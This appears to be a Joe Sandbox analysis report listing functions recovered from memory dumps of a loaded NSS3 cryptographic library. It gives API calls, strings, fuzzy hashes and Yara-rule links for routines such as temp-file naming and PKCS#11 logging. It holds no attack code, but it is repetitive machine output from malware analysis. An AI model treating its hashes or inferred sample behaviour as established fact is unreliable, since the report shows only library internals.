Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c7ec190cee2a19df23ab3e11c9c5c61e1819aedff53176a82eabc1c79682b2
Instruction ID: 244e7f6325ecf3afdd3580c0648ed4fad5c8021c43d776b3d32b3f7a9b2dbde8
Opcode Fuzzy Hash: 93c7ec190cee2a19df23ab3e11c9c5c61e1819aedff53176a82eabc1c79682b2
Instruction Fuzzy Hash: 56110976E002199F8B10DF99D9809EFBBF9EF8C664B554429ED18E7301D231ED118BE0

Function 6C834440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c8aa61cbbe21d966aa2df3f7f789a0d40af7f06fe80c162e850ecbac30ea4e
Instruction ID: 1d1f8cd2a4c2e5c2d4bb375aec4155bbe9230e45cab959ccd4aa99f87b48e152
Opcode Fuzzy Hash: 54c8aa61cbbe21d966aa2df3f7f789a0d40af7f06fe80c162e850ecbac30ea4e
Instruction Fuzzy Hash: 1511C975A002199F9B10DF99C9809EFBBF9EF8C214B16456AED18E7301D631ED118BE1

Function 6C8C0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: d8b12cb9c213d1e9d2c2c7c90bea483d03262e1bcf1e02a721776098101dcbe2
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 07E02B7930101467CB248F48C5006A93358DF81756FB4897DCE0D9FA01DB33F8438782

Function 6C8C6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7DF9C9,?,6C7DF4DA,6C7DF9C9,?,?,6C7A369A), ref: 6C77CA7A
Part of subcall function 6C77CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C77CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C78BE66), ref: 6C8C6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C78BE66), ref: 6C8C6E98
sqlite3_snprintf.NSS3(?,00000000,6C92AAF9,?,?,?,?,?,?,6C78BE66), ref: 6C8C6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C78BE66), ref: 6C8C6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C78BE66), ref: 6C8C6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C78BE66), ref: 6C8C6FA6
sqlite3_snprintf.NSS3(?,00000000,6C92AAF9,00000000,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C7014
sqlite3_free.NSS3(00000000,?,?,?,?,6C78BE66), ref: 6C8C701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C78BE66), ref: 6C8C7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C78BE66), ref: 6C8C7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C78BE66), ref: 6C8C70A0

Strings

winGetTempname2, xrefs: 6C8C70C4
mz_etilqs_, xrefs: 6C8C6F18
winGetTempname4, xrefs: 6C8C7046
winGetTempname5, xrefs: 6C8C7071
winGetTempname1, xrefs: 6C8C708F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: df7cb969e767d3a989e55925ed4e193658cc81265ffe8e84fc6d9b9d396b4605
Instruction ID: 2f071792424804cfc14b69adf1cf554085213878f0aed79c750ba49cd947329e
Opcode Fuzzy Hash: df7cb969e767d3a989e55925ed4e193658cc81265ffe8e84fc6d9b9d396b4605
Instruction Fuzzy Hash: 8D519BB2B051156BE72097309D59FBB362A9FE2308F244938E80597BC1FF25D40E82E3

Function 6C854FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8075C2,00000000,00000000,00000001), ref: 6C855009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8075C2,00000000), ref: 6C855049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C85505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C855071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C855089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8550A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C8550B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8075C2), ref: 6C8550CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8550D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8550F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C855103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C855145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C855153
free.MOZGLUE(?), ref: 6C85516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C85517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C855195

Strings

library=, xrefs: 6C855043
nss=, xrefs: 6C855083
config=, xrefs: 6C85509B
name=, xrefs: 6C855057
parameters=, xrefs: 6C85506B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: ed391b03ef400c55b52201628734619f8c43c19e75204ab7af5c744c07f9c5a9
Instruction ID: eef00d27ae654a38107c5747aac27624e22812ba57ac9a74574f4f48e7aa8bdc
Opcode Fuzzy Hash: ed391b03ef400c55b52201628734619f8c43c19e75204ab7af5c744c07f9c5a9
Instruction Fuzzy Hash: 4A51FBB1A412159FEB61DF24DE00AAF37A85F06248F540830EC19E7741E775E929C7B2

Function 6C828E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C828E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C828EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C828EB3

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C828EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C828EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C828F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C828F29
PR_LogPrint.NSS3(?,00000000), ref: 6C828F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C828F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C828F80
PR_LogPrint.NSS3(?,00000000), ref: 6C828F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C828FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C828FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C829047

Strings

pWrappedKey = 0x%p, xrefs: 6C828FAD
C_WrapKey, xrefs: 6C828E71
hKey = 0x%x, xrefs: 6C828F5B, 6C828F6B
hSession = 0x%x, xrefs: 6C828E8E, 6C828E9E
*pulWrappedKeyLen = 0x%x, xrefs: 6C829042
hWrappingKey = 0x%x, xrefs: 6C828F01, 6C828F11
(CK_INVALID_HANDLE), xrefs: 6C828EAC, 6C828F1F, 6C828F79
pMechanism = 0x%p, xrefs: 6C828EE0
pulWrappedKeyLen = 0x%p, xrefs: 6C828FC8

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: ee0bcd4870ce72d4c71fa5cacb5611c17af5f16169dde63f728895be2a06c01e
Instruction ID: 82fd1ed6f2d1437c80bf6f7f9b27df30ba79553e40056a368c1c5d6b64fb2831
Opcode Fuzzy Hash: ee0bcd4870ce72d4c71fa5cacb5611c17af5f16169dde63f728895be2a06c01e
Instruction Fuzzy Hash: EB51F132A05508EFDB209F549E4CF9B77B6AB5231CF84442AF5086BB12D738D988CBD1

Function 6C854C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854C5B
PR_smprintf.NSS3(6C92AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C854CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C854CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C854D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C844F51,00000000), ref: 6C854D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C854D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C854DA2
free.MOZGLUE(?), ref: 6C854DB9
free.MOZGLUE(00000000), ref: 6C854DCF

Strings

timeout, xrefs: 6C854C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C854D9D
any, xrefs: 6C854C96
slotFlags, xrefs: 6C854D34
every, xrefs: 6C854CA1
%s,%s, xrefs: 6C854C4B
0x%08lx=[%s %s], xrefs: 6C854D80
rootFlags, xrefs: 6C854D47
ootT, xrefs: 6C854D1A
rust, xrefs: 6C854D22

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: c04b93f8048bc5a77d551465426747f2e801670f59f0815287fafc8c087cd4cb
Instruction ID: 3f3df524dd5c2adf5459d572b7ced9e57504098207aad054c509cf3ed1a38994
Opcode Fuzzy Hash: c04b93f8048bc5a77d551465426747f2e801670f59f0815287fafc8c087cd4cb
Instruction Fuzzy Hash: BC41DEB29101416BDB229F189C44ABF3A65AFD230DF998538EC0A0B705E779D938C7D3

Function 6C832D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C832DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C832E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C832E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C832E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C804F1C,?,-00000001,00000000,?), ref: 6C832E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C804F1C,?,-00000001,00000000), ref: 6C832E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C832EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C832EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C832EF8
PR_Unlock.NSS3(?), ref: 6C832F62
TlsGetValue.KERNEL32 ref: 6C832F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C832F9E
PR_Unlock.NSS3(?), ref: 6C832FCA
TlsGetValue.KERNEL32 ref: 6C83301A
EnterCriticalSection.KERNEL32(?), ref: 6C83302E
PR_Unlock.NSS3(?), ref: 6C833066
PR_SetError.NSS3(00000000,00000000), ref: 6C833085
PR_Unlock.NSS3(?), ref: 6C8330EC
TlsGetValue.KERNEL32 ref: 6C83310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C833124
PR_Unlock.NSS3(?), ref: 6C83314C

Part of subcall function 6C819180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C84379E,?,6C819568,00000000,?,6C84379E,?,00000001,?), ref: 6C81918D
Part of subcall function 6C819180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C84379E,?,6C819568,00000000,?,6C84379E,?,00000001,?), ref: 6C8191A0

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

PR_SetError.NSS3(00000000,00000000), ref: 6C83316D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 31d3a96c128e21d708e6174665fc3d57ead3f4a33bdfa81e32e3dcfcd959ef3d
Instruction ID: 9b6d9f9086fbafb1802156636a54e933c0cfb9e5b897e9f5f840bac734aeceba
Opcode Fuzzy Hash: 31d3a96c128e21d708e6174665fc3d57ead3f4a33bdfa81e32e3dcfcd959ef3d
Instruction Fuzzy Hash: 51F1CEB1D042189FDF10DFA8D944A9EBBB4BF09318F146969EC08A7712E734E995CBC1

Function 6C82AF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C82AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C82AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C82AF83

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C82AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C82AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C82AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C82AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C82B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C82B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C82B041

Strings

ulDataLen = %d, xrefs: 6C82B00A
ulParameterLen = 0x%p, xrefs: 6C82AFD4
hSession = 0x%x, xrefs: 6C82AF5E, 6C82AF6E
pSignature = 0x%p, xrefs: 6C82B023
(CK_INVALID_HANDLE), xrefs: 6C82AF7C
C_SignMessage, xrefs: 6C82AF41
pParameter = 0x%p, xrefs: 6C82AFB9
pData = 0x%p, xrefs: 6C82AFEF
pulSignatureLen = 0x%p, xrefs: 6C82B03C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 2299f2a621247f19a26d03b197e667713b8b0fb997d8a5c0422ee7080075a83a
Instruction ID: 8ac0c4f142090847fcbfb0c90cf219241ff5ceba68269c0ee262f7e729f4264f
Opcode Fuzzy Hash: 2299f2a621247f19a26d03b197e667713b8b0fb997d8a5c0422ee7080075a83a
Instruction Fuzzy Hash: DE412375A05004EFDB108F54DE4CE9A7BB2BB9231DF984429E91867B11DB38C998CBE1

Function 6C836CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C836910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C836943
Part of subcall function 6C836910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C836957
Part of subcall function 6C836910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C836972
Part of subcall function 6C836910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C836983
Part of subcall function 6C836910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8369AA
Part of subcall function 6C836910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8369BE
Part of subcall function 6C836910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8369D2
Part of subcall function 6C836910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8369DF
Part of subcall function 6C836910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C836A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C836D8C
free.MOZGLUE(00000000), ref: 6C836DC5
free.MOZGLUE(?), ref: 6C836DD6
free.MOZGLUE(?), ref: 6C836DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C836E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C836E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C836E72
free.MOZGLUE(?), ref: 6C836EA7
free.MOZGLUE(?), ref: 6C836EC4
free.MOZGLUE(?), ref: 6C836ED5
free.MOZGLUE(00000000), ref: 6C836EE3
free.MOZGLUE(?), ref: 6C836EF4
free.MOZGLUE(?), ref: 6C836F08
free.MOZGLUE(00000000), ref: 6C836F35
free.MOZGLUE(?), ref: 6C836F44
free.MOZGLUE(?), ref: 6C836F5B
free.MOZGLUE(00000000), ref: 6C836F65

Part of subcall function 6C836C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C83781D,00000000,6C82BE2C,?,6C836B1D,?,?,?,?,00000000,00000000,6C83781D), ref: 6C836C40
Part of subcall function 6C836C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C83781D,?,6C82BE2C,?), ref: 6C836C58
Part of subcall function 6C836C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C83781D), ref: 6C836C6F
Part of subcall function 6C836C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C836C84
Part of subcall function 6C836C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C836C96
Part of subcall function 6C836C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C836CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C836F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C836FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C836FF4

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
